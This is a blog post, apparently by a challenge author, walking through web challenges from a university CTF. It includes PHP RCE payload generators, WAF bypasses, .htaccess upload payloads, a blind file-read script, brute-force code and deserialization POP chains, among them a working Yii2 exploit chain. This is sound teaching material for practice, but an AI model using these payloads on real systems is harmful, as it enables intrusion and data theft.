[SCU校赛]Web部分-Writeup

最新推荐文章于 2021-07-16 16:57:50 发布
最新推荐文章于 2021-07-16 16:57:50 发布
阅读量3.6k 收藏 9
点赞数 10
分类专栏: 安全学习 # Web # CTF记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/117607859
版权
安全学习 同时被 3 个专栏收录
210 篇文章 81 订阅
订阅专栏
Web
94 篇文章 21 订阅
订阅专栏
CTF记录
88 篇文章 8 订阅
订阅专栏

文章目录

写在前面

我出的题不太难,但是有意思,个人感觉质量还是不错的,有简单有难,区分度明显,这里出个部分wp,这里感谢atao让本懒狗少了一部分工作量o( ̄▽ ̄)ブ

入门

在这里插入图片描述

fastapi

本来是作为一个签到题出的,事实上也是
首先看到官网,有个能查到api的地方得到路径
在这里插入图片描述
看到参数名,想到后端是eval,题目里面打错了是f10g,
在这里插入图片描述
直接

解法一

在这里插入图片描述

解法二

可以执行任意命令了
在这里插入图片描述

解法三

当然SSTI的方式也可以打出来,自己去找找学一学,看看我的这一篇

shell

倒是不难,出了点小事故后面又放了新的,这里写下预期

preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)

能看到这里过滤蛮多,但是发现~在,直接取反就行了,Y4自用脚本建议私藏

<?php

function negateRce(){
    fwrite(STDOUT,'[+]your function: ');

    $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

    fwrite(STDOUT,'[+]your command: ');

    $command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

    echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
}

negateRce();

在这里插入图片描述
执行,有手就行

system("cat /flag");

奇妙的验证码

被某个野兽出题人要求做了一下,这里整理我的题目的时候看到了脚本就顺便说一下
爆出密码
在这里插入图片描述
得到flag
在这里插入图片描述
脚本如下,比较骚,弹计算器,不愧是某pu

import requests
session = requests.session()

url_pre = 'http://xxxxx'
url_cap = url_pre + '/captcha.php'
url_log = url_pre + '/login.php'

for i in range(1000,9999):
    res = session.get(url_cap).text
    while '__import__' in res:
        res = session.get(url_cap).text
    data = {
        'username': 'admin',
        'password': f'{i}',
        'captcha': (eval(res)),
        'objectType': 'Window',
    }
    r = session.post(url_log, data=data)
    if "Wrong username or password" not in eval(r.text)['msg']:
        print(r.text)
        print(i)

野兽先辈的文件

首先点开题目,界面很简单

在这里插入图片描述

尝试下载flag,发现足足1pb,这么大的文件显然无法在合理的时间下载完
在这里插入图片描述

已经暗示(其实几乎是明示)了flag就在文件的末尾,要“跳过去”看。

想想平时用的多线程下载器,它可以从文件的中间部分下载,每一个线程负责下载文件的某一部分最后组合起来,实现多线程告诉下载,这样的下载器都能跳,那么一定有一个方法可以从文件中的任意一点开始下载。
在这里插入图片描述

这个时候,动动手指就可以搜到原理了。
在这里插入图片描述
看到range头格式如下。
在这里插入图片描述
那么打开我们心爱的Burp,手动发包试试。
(Burp的基础原理这道题就不介绍了,Google,请
在这里插入图片描述
如上图所示,当我们请求Range为1000-2000的时候,服务器返回了文件1000-2000字节的内容,并且告诉了我们文件的总大小是1145141919810893个字节,顺便说一下我们的浏览器也是通过这种办法在下载文件的时候获取文件的总大小的。

那么我们更换bytes里的内容,直接读取文件最后,就可以拿到flag了。
在这里插入图片描述

Bypass_waf

在这里插入图片描述
看到就怕了吧,hh
在这里插入图片描述

解法一

php太灵活了,所以绕过很多,自写脚本,自己理解下

<?php
/**
 * Created by Y4tacker
 **/



function generatePayload($eval){
    $res = '';
    for ($i=0;$i<strlen($eval);$i++){
        if ($i!=strlen($eval)-1){
            $tmp = "chr(".ord($eval[$i]).").";
        }else{
            $tmp = "chr(".ord($eval[$i]).")";
        }
        $res.=$tmp;
    }
    return "(join(array(".$res.")))";
}

$eval = "system";
$command = "cat /flag";

echo "eval=".generatePayload($eval).generatePayload($command).";&look=1";

解法二

对于POST的内容,它是通过file_get_contents('php://input')获得的内容,这里就有了第一个绕过方法,将POST请求改为multipart/form-data则上述方法无法接收到参数,过滤函数就无法起到作用,可以绕过。
在这里插入图片描述

解法三

Payload来自:lastsward
在这里插入图片描述

upload

点我学一学
这里发现存在源码泄露www.zip
过滤了file,用\绕过即可
在这里插入图片描述

<Fil\
es .htaccess>
SetHandler application/x-httpd-php
Require all granted
php_flag engine on
</Fi\
les>
php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();

在这里插入图片描述
这里用php自带函数绕过
在这里插入图片描述

unserialize

考点:简单的POP链构造、MD5碰撞
代码如下:

<?php
error_reporting(0);
highlight_file(__FILE__);
class hackMe{
    protected $formatters;   
    public function __call($method, $attributes){
        return $this->format($method, $attributes);
    }
    
    public static function hackMMM(){
        echo "Hello web🐶!";
    }

    public function format($formatter, $arguments)
    {
        $this->getFormatter($formatter)->patch($arguments[0][4][1]);
    }
    public function getFormatter($formatter)
    {
        if (isset($this->formatters[$formatter])) {
            return $this->formatters[$formatter];
        }
    }
}

class Ox401{
    protected $events;
    protected $event;
    public function __destruct(){
        $this->events->dispatch($this->event);
    }
     public static function welcome(){
        echo "Welcome to 0x401 Team!";
    }
}

class flag{
    protected $f1ag;
    public function patch($Fire){
        call_user_func($this->f1ag,$Fire);
    }
}

if($_POST['a']!=$_POST['b'] && md5($_POST['a'])===md5($_POST['b'])){
    if(file_get_contents(substr($_POST['a'],0,20))!=null){
        @unserialize(base64_decode($_POST['c']));
    }else{
        hackMe::hackMMM();
    }
}else{
    Ox401::welcome();
}
?>

在进行反序列化之前会有md5的强比较,之前遇到这种值的时候,一般绕过手段是使用数组或者是一对特定的字符串,但是这里额外加入了一个条件file_get_contents(substr($_POST['a'],0,20)),如果去不到这个文件,那也不能进行反序列化,所以这里使用了fastcoll工具,它可以对指定文件进行md5碰撞,从而获得两个md5值相同的文件

shell
fastcoll.exe -p 123.txt -o 1.txt 2.txt
工具下载
链接:https://pan.baidu.com/s/1t8q89aP50oiFVyFe0JrbJw
提取码:atao
复制这段内容后打开百度网盘手机App,操作更方便哦

接着就是构造POP链了

class Ox401 -> __destruct		//建立hackMe对象,当调用不存在的方法时触发__call
↓↓↓
class hackMe -> __call 			//建立flag对象
↓↓↓
class flag -> patch				//回调函数进行代码执行

exp

<?php
class hackMe{
    protected $formatters;
    public function __construct(){
        $this->formatters['dispatch'] = new flag();
    }
}

class Ox401{
    protected $events;
    protected $event;
    public function __construct(){
        $this->events = new hackMe();
        $this->event[4][1]= "cat /flag";
    }
}

class flag{
    protected $f1ag = "system";
}

echo base64_encode(serialize(new Ox401()))."\n";

ez_upload

过滤的更严格了,这里推荐另一种之前考过的利用htaccess读文件,这样如果flag匹配到,则404页面显示y4tacker,因此利用这个特性搞定

import requests
import string

addr = '28957c94804599d479ebab0c1eb12156'
def check(a):
  f = '''
  <If "fi\\
le('/flag')=~ /'''+a+'''/">
 ErrorDocument 404 "y4tacker"
 </If>
  '''
  resp = requests.post("http://42x.250:xxxx/index.php",data={'submit': 'submit'}, files={'file': ('.htaccess',f)} )
  a = requests.get("http://42.1xxxx18816/upload/"+addr+"/a").text
  if "y4tacker" not in a:
   return False
  else:
   return True
flag = "flag{"
c = "u-"+string.ascii_letters + string.digits + "\{\}"
for j in range(32):
 for i in c:
  print("checking: "+ flag+i)
  if check(flag+i):
   flag = flag+i
   print(flag)
   break
  else:
   continue

easy_yii

看到这个,根据hint就去学一下yii利用链子就行了
在这里插入图片描述
我博客也有的,很简单,学一下命名空间请

加了点过滤而已,最终payload


http://url/web/?r=test/test&name=O%3A23%3A%22yii%5Cdb%5CBatchQueryResult%22%3A1%3A%7Bs%3A36%3A%22%00yii%5Cdb%5CBatchQueryResult%00_dataReader%22%3BO%3A15%3A%22Faker%5CGenerator%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00formatters%22%3Ba%3A1%3A%7Bs%3A5%3A%22close%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A20%3A%22yii%5Crest%5CIndexAction%22%3A2%3A%7Bs%3A11%3A%22checkAccess%22%3Bs%3A14%3A%22highlight_file%22%3Bs%3A2%3A%22id%22%3Bs%3A5%3A%22%2Fflag%22%3B%7Di%3A1%3Bs%3A3%3A%22run%22%3B%7D%7D%7D%7D


<?php
namespace yii\db;
class BatchQueryResult extends \yii\base\BaseObject{
    private $_dataReader;
    public function __construct()
    {
        $this->_dataReader=new \Faker\Generator();
    }
}
namespace yii\base;
class BaseObject{
}
namespace yii\rest;
class Action{

    public $checkAccess='highlight_file';
    public $id='/flag';
}
class IndexAction extends Action{
}
namespace Faker;
class Generator{
    protected $formatters = array();
    public function __construct()
    {
        $this->formatters['close']=[(new \yii\rest\IndexAction()),"run"];
    }
}
use \yii\db\BatchQueryResult;
$c=new BatchQueryResult();
print(urlencode(serialize($c)));

ez_auth

打开题目代码如下

<?php 
error_reporting(0); 
include "config.php"; 

function LoginSign($array, $key) 
{ 
    if (isset($array['auth'])){ 
        unset($array['auth']); 
    } 
    return md5(implode('-', $array) . $key); 
} 

foreach ($_GET as $key => $val) { 
    if (!isset($$key)) { 
        $$key = $val; 
    } 
} 

foreach ($_POST as $key => $val) { 
    //过滤全局变量 
    if (isset($key) && $val[0] !== '_') { 
        $tmp = json_decode($val); 
        foreach ($tmp as $kkey => $vval) { 
            ${$key}[$kkey] = $vval; 
        } 
    }else{ 
        die("fucccc????"); 
    } 
} 
if (isset($auth)) { 
    if (LoginSign($_GET, $secrett) === $auth) { 
        if (in_array($username, array('admin'))) { 
            echo("Congratulations!</br>Give you flag❀:"); 
            echo fread(fopen("/flag","r"),200); 
        } else { 
            echo 'welcome ' . $username . 'but only admin can get flag!'; 
            echo '</br>'; 
        } 
    } else { 
        echo 'wrong auth.</br>Guess the authkey???'; 
    } 
} else { 
    highlight_file(__FILE__); 
    die("Please Login first!"); 
     
}

我们需要抓住几个地方,第一点,对于不存在的变量,可以通过get请求实现赋值

foreach ($_GET as $key => $val) { 
    if (!isset($$key)) { 
        $$key = $val; 
    } 
}

第二点,我们可以通过post传参实现对除全局变量以外的值

foreach ($_POST as $key => $val) { 
    //过滤全局变量 
    if (isset($key) && $val[0] !== '_') { 
        $tmp = json_decode($val); 
        foreach ($tmp as $kkey => $vval) { 
            ${$key}[$kkey] = $vval; 
        } 
    }else{ 
        die("fucccc????"); 
    } 
}

回到拿flag的地方

if (isset($auth)) { 
    if (LoginSign($_GET, $secrett) === $auth) { 
        if (in_array($username, array('admin'))) { 
            echo("Congratulations!</br>Give you flag❀:"); 
            echo fread(fopen("/flag","r"),200); 
        }

我们从最里层一层一层网上,首先是in_array($username, array('admin'),,没有username变量,可以通过GET请求赋值为admin使其满足条件,下一层
LoginSign($_GET, $secrett) === $auth

function LoginSign($array, $key) 
{ 
    if (isset($array['auth'])){ 
        unset($array['auth']); 
    } 
    return md5(implode('-', $array) . $key); 
}

我们通过get传参传入的变量auth与真正的auth的md5进行比较,而由于可以使用post传参进行变量覆盖,这个auth也自然可控制了,参考payload

http://xxx/index.php?username=admin&auth=b5d0baf7bc06b412e077c422e5b3cb74

secrett=["1", "1", "1", "1", "1", "1", "1", "1", "1", "1", "1", "1", "1","1", "1", "1", "1", "1", "1", "1", "1","1", "1", "1", "1", "1", "1", "1","1", "1", "1", "1"]

not_sql

在这里插入图片描述

源码泄露www.zip
首先是index.php,根据file传入参数引入文件

<?php
require_once "func.php";

if(isset($_GET['file'])){
	require_once(__DIR__."/".$_GET['file'].".php");
}
else{
	if($_SESSION['login']=='apuNvZHuang'){
		echo "<script>window.location.href='./index.php?file=update'</script>";
	}
	else{
		echo "<script>window.location.href='./index.php?file=login'</script>";
	}
}
?>

接下来是登录页面,还算是比较严格
在这里插入图片描述
从update,php当中可以看见,只要登录就有flag

<?php
require_once('func.php');
echo '<html>
<meta charset="utf-8">
<title>update</title>
</html>';
if ($_SESSION['login']!='apuNvZHuang'){
	echo "登陆admin就给Flag,我保证,🙏!";
}
$users=new User();
$users->update();
if($_SESSION['login']==='apuNvZHuang'){
	require_once("flag.php");
	echo $flag;
}

?>

接下来func.php

<?php
error_reporting(0);
session_start();
function safe($parm){
        $array= array('out','like','union','regexp','load','into','flag','dump','insert',"'",'\\',"*","alter");
    return str_replace($array,'fuckU!',$parm);
}
class User
{
    public $id;
    public $age=null;
    public $nickname=null;
    public function login() {
        if(isset($_POST['username'])&&isset($_POST['password'])){
        $mysqli=new dbCtrl();
        $this->id=$mysqli->login('select id,password from user where username=?');
        if($this->id){
        $_SESSION['id']=$this->id;  
        $_SESSION['login']='apuNvZhuang';
        echo "你好!".$_SESSION['token'];
        echo "<script>window.location.href='./update.php'</script>";
        return $this->id;
        }
    }
}
    public function update(){
        $Info=unserialize($this->getNewinfo());
        $age=$Info->age;
        $nickname=$Info->nickname;
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);
    }
    public function getNewInfo(){
        $age=$_POST['age'];
        $nickname=$_POST['nickname'];
        return safe(serialize(new Info($age,$nickname)));
    }
    public function __destruct(){
        return file_get_contents($this->nickname);//危
    }
    public function __toString()
    {
        $this->nickname->update($this->age);
        return "";
    }
}
class Info{
    public $age;
    public $nickname;
    public $CtrlCase;
    public function __construct($age,$nickname){
        $this->age=$age;
        $this->nickname=$nickname;
    }   
    public function __call($name,$argument){
        echo $this->CtrlCase->login($argument[0]);
    }
}
Class UpdateHelper{
    public $id;
    public $newinfo;
    public $sql;
    public function __construct($newInfo,$sql){
        $newInfo=unserialize($newInfo);
        $upDate=new dbCtrl();
    }
    public function __destruct()
    {
        echo $this->sql;
    }
}
class dbCtrl
{
    public $hostname="127.0.0.1";
    public $dbuser="y4tacker";
    public $dbpass="y4tacker";
    public $database="y4tacker";
    public $name;
    public $password;
    public $mysqli;
    public $token;
    public function __construct()
    {
        $this->name=$_POST['username'];
        $this->password=$_POST['password'];
        $this->token=$_SESSION['token'];
    }
    public function login($sql)
    {
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);
        if ($this->mysqli->connect_error) {
            die("connection error:" . $this->mysqli->connect_error);
        }
        $result=$this->mysqli->prepare($sql);
        $result->bind_param('s', $this->name);
        $result->execute();
        $result->bind_result($idResult, $passwordResult);
        $result->fetch();
        $result->close();
        if ($this->token=='admin') {
            return $idResult;
        }
        if (!$idResult) {
            echo('wrong user!');
            return false;
        }
        if (md5($this->password)!==$passwordResult) {
            echo('wrong password!');
            return false;
        }
        $_SESSION['token']=$this->name;
        return $idResult;
    }

}

又臭又长,但是首行很明显,能猜测考点是反序列化字符逃逸

function safe($parm){
        $array= array('out','like','union','regexp','load','into','flag','dump','insert',"'",'\\',"*","alter");
    return str_replace($array,'fuckU!',$parm);
}

找找利用点,
在这里插入图片描述

很明显接下来就是构造pop链了

UpdateHelper->__destruct
User->__toString
Info->__call
dbCtrl->login

给出链子大家学一学

class User
{
    public $age='select password,id from user where username=?';
    public $nickname=null;
}
class Info{
    public $age;
    public $nickname;
    public $CtrlCase;
}
class UpdateHelper
{
    public $sql;
}
class dbCtrl
{
    public $hostname = "127.0.0.1";
    public $dbuser="noob123";
    public $dbpass="noob123";
    public $database="noob123";
    public $name='admin';
    public $token = 'admin';
}

function post($data){
    $data = http_build_query($data);
    $opts = array (
        'http' => array (
            'method' => 'POST',
            'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .
                "Content-Length: " . strlen($data) . "\r\n",
            'content' => $data
        )
    );
    $html = file_get_contents('http://42.192.137.212:1235/index.php?action=update', false, stream_context_create($opts));
    echo $html;
}

$x = new UpdateHelper();
$x->sql = new User();
$x->sql->nickname = new Info();
$x->sql->nickname->CtrlCase = new dbCtrl();

如果我们能够正确反序列化也就可以实现任意sql语句的执行了
接下来我们去实现逃逸的操作,这里我用union没替换为一次fu**u!就挤出去一个字符

$p = '";s:8:"CtrlCase";' . serialize($x) . "}";
$p = str_repeat('union', strlen($p)).$p;
echo($p);

有手就行

[MTCTF]从出题人视角看ez_cms

推荐文章

无字母数字webshell之提高篇
[CTF]PHP反序列化总结
[CTF].htaccess的使用技巧总结
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行

Y4tacker
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
2021SCUCTFweb之奇妙的验证码
luo1289的博客
06-07 920
题目给出信息: 用户名为 admin 密码为四位数字 验证码为一个表达式的结果 验证码错误会导致密码重置 xiang'dao
关于CTF学习总结
m0_37496212的博客
02-26 2754
# -*-coding:utf-8-*- import requests import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' #不区分大小写的 flag = &amp;quot;&amp;quot; print(&amp;quot;Start&amp;quot;) for i in range(33): for payload in payloads: s
CJ1W-SCU模块协议宏做Modbus-RTU主站
08-17
CJ1W-SCU模块协议宏做Modbus-RTU主站
md5一些绕过方法
m0_56059226的博客
07-16 2516
弱比较 if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){ die("success!"); } 在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过 payload: a=QNKCDZO&b=s878926199a 常用md5加密后为0的字符串: 240610708,aabg7XSs,aabC9RqS s878926199a 0e215962017...
CTF-web 第十三部分 命令注入
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6260
一、CTF题目 前阵子,参加了一个CTF比,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
ctf中的一道反序列化题
weixin_40709439的博客
09-27 5233
早就想写了,今天刚好遇到一道反序列化的题就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
SCUCTF2020部分writeup
博客
06-21 1089
SCUCTF2020部分writeup MISC 专 业 团 队 binwalk -e Daning.png 提取出word文档 scuctf{19cc63ff-50b9-4254-a997-89d613290918} 记录 flag{b80e3ba4-055f-4c26-9482-23dc46424852} APU的犯罪证据 上传的shell <?php session_start(); function fastpow($a,$b,$c) { if($b==0) ret
cs反序列化4
missht0的博客
01-29 325
cs反序列化4 <?php highlight_file(__FILE__); error_reporting(0); class test{ public $peguin; public $source; public function __construct($file){ $this->source = $file; echo 'welcome to '.$this->source."<br>"; }
SCU-First-Year-Course-Plan
07-10
SCU-第一年课程计划这是为圣克拉拉大学软件工程班设计的项目。 它旨在根据他们之前的课程作业(例如 AP、IB 或其他可能授予他们学分的大学水平课程)为即将入学的计算机工程学生生成定制的第一年课程计划。 前端主要...
SCU-19_PC_Connection_Cable_Driver.zip
02-17
八重洲ft1dr,2dr,3dr数据线SCU-19驱动程序。SCU-19_PC_Connection_Cable_Driver.zip
数据库课程设计-SCU园论坛项目.zip
最新发布
02-17
包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】: 所有源码都经过严格测试,可以直接运行。 功能在确认正常工作后才上传。 【适用人群】...
一天一道CTF 特别篇
scrawman的博客
03-17 747
今天做一下我们战队大佬提供的php反序列化的题目,第一次完全凭自己本事做题,跃跃欲试。 关于反序列化:https://www.freebuf.com/articles/web/167721.html unserialize-basic-1 源代码: <?php /** * index.php * php7.1+反序列化对类属性不敏感 * */ class test{ protected $filename; public function __construct(){
2019年第十二届全国大学生信息安全竞部分WriteUp-jedi
test
05-03 5449
第十二届全国大学生信息安全竞部分WriteUp 0x00 签到题 操作内容: 下载链接,解压并运行软件,对准两个聚焦圆圈,控制台回车输出flag FLAG值: FLAG{87e37d95-6a48-4463-aff8-b0dbd27d3b7d} 0x01 SALEAE 操作内容: 打开发现是.logicdata(逻辑分析仪数据文件),使用Logic软件打开,根据时钟频率以及通讯方式擦侧是属于S...
buuoj、xmctf、攻防世界刷题(web)write up
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
【moeCTF题解-0x06】Web
框架科工:Framecraft
11-06 2466
title: 【moeCTF题解-0x06】Web categories: CTF moeCTF tags: CTF Web Python 【moeCTF题解-0x06】Web 竟然AK了这部分,但也只是因为题目简单…… 考虑到在XDSEC里选了web方向,也要好好学习web知识呀 【moeCTF题解】总目录如下:(若本文图片看不见请访问以下相应的地址) 【moeCTF题解-0x00】序 (包括Sign in) 【moeCTF题解-0x01】Reverse (包括An.
[CTFSHOW]反序列化
Huamang的博客
04-27 1085
web257 <?php error_reporting(0); highlight_file(__FILE__); class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->c
CTFWeb-BUUCTF竞真题WriteUp(1)
道阻且长,行则将至。
08-20 7628
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比真题环境: 此处记录下部分 Web 题目练习过程。 N0.1 强网杯-高明的黑客 1、创建并访问靶机: 2、根据题目提示,访问并下载 www.tar.gz: 打开压缩包,发现有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发现代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
[CTFSHOW]SQL注入(WEB入门)
热门推荐
Y4tacker的博客
11-25 1万+
文章目录前言新手区web171web172web173web174 前言 看大家好像挺需要的所以在这里记录一下自己的脚本和payload,不做思路讲解,除非题目比较骚 新手区 可以看看我以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) web171 比较常规的题目不做讲解了,这里给出payload # 查数据库 payload = "-1'union select 1,2,group_concat(table_name) from information
storescu: DICOM storage (C-STORE) SCU error: Unknown option -x
07-14
非常抱歉给你带来困扰,确实在 DICOM 工具 DCMTK 的 `storescu` 中不存在 `-x` 选项来指定传输语法。在 `storescu` 中,默认使用本地系统的传输语法来发送 DICOM 文件。 要指定传输语法,你可以通过设置环境变量 `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值